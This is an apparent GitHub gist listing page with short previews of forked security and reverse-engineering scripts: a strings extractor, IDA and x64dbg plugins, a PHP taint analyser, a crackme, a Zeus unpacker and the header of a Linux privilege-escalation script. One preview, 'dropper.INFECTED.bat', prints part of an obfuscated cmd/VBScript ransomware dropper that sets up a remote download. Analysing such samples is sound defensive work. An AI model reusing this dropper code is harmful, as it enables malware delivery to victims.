spnow
/ strings.py
Created
August 17, 2016 10:23
— forked from trietptm/strings.py
Extract ASCII and Unicode strings using Python.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| ########################################################################################################## | |
| ## | |
| ## Like steroids for your strings! | |
| ## | |
| ## Original idea: @williballenthin | |
| ## Original link: https://gist.github.com/williballenthin/8e3913358a7996eab9b96bd57fc59df2 | |
| ## | |
| ## Lipstick and rouge by: @herrcore |
spnow
/ quick_ioctl_decoder.py
Created
August 17, 2016 10:23
— forked from herrcore/quick_ioctl_decoder.py
IDA Python plugin - Decode IOCTL Codes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ############################################################################################ | |
| ## | |
| ## Quick IOCTL Decoder! | |
| ## | |
| ## All credit for actual IOCTL decode logic: | |
| ## http://www.osronline.com/article.cfm?article=229 | |
| ## | |
| ## | |
| ## To install: | |
| ## Copy script into plugins directory, i.e: C:\Program Files\IDA 6.8\plugins |
spnow
/ analyze.py
Created
August 17, 2016 10:28
— forked from endeav0r/analyze.py
This is a quick, static taint-analysis script targetting PHP as seen on: http://rainbowsandpwnies.com/~endeavor/blog/finding-sqli-through-taint-analysis.html . It may be a bit hackish.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from phply.phpparse import parser | |
| import phply.phplex as phplex | |
| from phply.phpast import * | |
| import sys | |
| import copy | |
| import os.path | |
| import pickle | |
| import subprocess | |
| import traceback |
spnow
/ crackme.c
Created
August 17, 2016 10:50
— forked from trietptm/crackme.c
A demonstration of Markus Gaasedelen's method for reversing a binary - see URL in find_password.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdlib.h> | |
| #include <stdio.h> | |
| void main(int argc, char *argv[]) | |
| { | |
| if( argv[1][0] == 'f' ) { | |
| if( argv[1][1] == 'o' ) { | |
| if( argv[1][2] == 'o' ) { | |
| if( argv[1][3] == '\x00' ) { | |
| printf( "good password\n" ); |
spnow
/ disable_wsh.reg
Created
August 17, 2016 17:31
— forked from trietptm/disable_wsh.reg
Disable Windows Script Host (for prevention of recent ransomware phishing attacks)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script Host\Settings] | |
| "Enabled"="0" |
spnow
/ zeus.osc
Created
August 17, 2016 17:31
— forked from trietptm/zeus.osc
ODbgScript for unpacking Zeus malware (ResumeThread)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Generic Zeus malware unpacker (ResumeThread) | |
| // by Miroslav Stampar (@stamparm) | |
| // http://about.me/stamparm | |
| VAR ResumeThread | |
| VAR msg | |
| VAR xname | |
| VAR xloc | |
| VAR xsize |
spnow
/ hacking_websites_list_(+1200).txt
Created
August 17, 2016 17:48
— forked from trietptm/hacking_websites_list_(+1200).txt
http://pastebin.com/eE5yLEca
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| By Tanguy Andreani | |
| Twitter: @andreani_tanguy | |
| Website: https://globalnewsys.wordpress.com/ | |
| Date: 1 July 2014 | |
| More than 1200 websites ! | |
| Blogs on Computer Security: | |
| https://antelox.blogspot.com/ |
spnow
/ dropper.INFECTED.bat
Created
August 17, 2016 17:49
— forked from trietptm/dropper.INFECTED.bat
Command line execution acting as a dropper - found inside a malicious document (probably cerber ransomware)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cmd.exe /V /C set "FKO=%RANDOM%" && (for %i in ("Dim LXZxe0" "suB GdBocmWra2bHN()" "LCtcOqCDnnH=16+11" "On eRROR resUME neXt" "NVJjYA=9+60" "DIm I7U6poXRu,GiWuI,BoUfvWYBUkKj,IUJthZDvQAl" "Y9cKZng13vo=40+64" "IUJthZDvQAl="SVXQDEt1loQ6LlG"" "Q1u0qcM7Qv9Lv=98+61" "I7U6poXRu=SHpwygLQgHdJ("1C354D39787C1D224319463E002C172D5C67213C5F","MtA9IBS2U4nhQr")" "UUlJ36frjukOf=4+85" "seT GiWuI=cReaTeOBJEcT(SHpwygLQgHdJ("1B3132362A075E0A1B7F6E01200F070208",IUJthZDvQAl))" "PjtwgPXl=60+45" "GiWuI.opEN SHpwygLQgHdJ("320C31","KuIefPyEKG7jD28"),I7U6poXRu,0" "LxFoiv6rfAMR6=48+79" "GiWuI.setRequESthEaDer SHpwygLQgHdJ("1359183537","YA8vRRDzISQ1tmJ"),SHpwygLQgHdJ("51212E22364D666B4079","T3XZGEpRXr")" "D0jDQ36=89+30" "GiWuI.sEnd()" "Q30TTtK7H7DXR6BB8=65+76" "If GiWuI.STatUsTexT<>SHpwygLQgHdJ("172A1A0506562B7A0E152127173631","EGKhqo7GZMzOSrX") THen PEIwKPwhVFEYy2a" "L360=60+17" "eND Sub" "Sub NEWtZ()" "GPUDsi=67+57" "TfgjBtEZiAm1I" "Dim TlmAoztjgrep3nIj2,Umdr3G2bHN,FoHwraR,KzSFDJqxxi64,JyU1NQwdLZlhoO" "K0Q2UNY=9+6" "On ERRoR resumE nexT |
spnow
/ LinuxPrivEsc.sh
Created
December 22, 2016 11:11
— forked from 1N3/LinuxPrivEsc.sh
Linux Privilege Escalation Script by 1N3 @CrowdShield - https://crowdshield.com
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # | |
| # `7MN. `7MF' | |
| # __, MMN. M | |
| #`7MM M YMb M pd""b. | |
| # MM M `MN. M (O) `8b | |
| # MM M `MM.M ,89 | |
| # MM M YMM ""Yb. | |
| #.JMML..JML. YM 88 | |
| # (O) .M' |
spnow
/ upx.py
Created
December 22, 2016 11:50
— forked from trietptm/upx.py
Unpacking UPX with x64dbgpy
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from x64dbgpy.pluginsdk import * | |
| import sys | |
| cip = register.GetCIP() | |
| if memory.ReadByte(cip) != 0x60: | |
| gui.Message("Start at UPX entry point (1:[CIP]==0x60)") | |
| exit(0) | |
| x64dbg.DbgCmdExecDirect("bc") | |
| x64dbg.DbgCmdExecDirect("bphwc") |
OlderNewer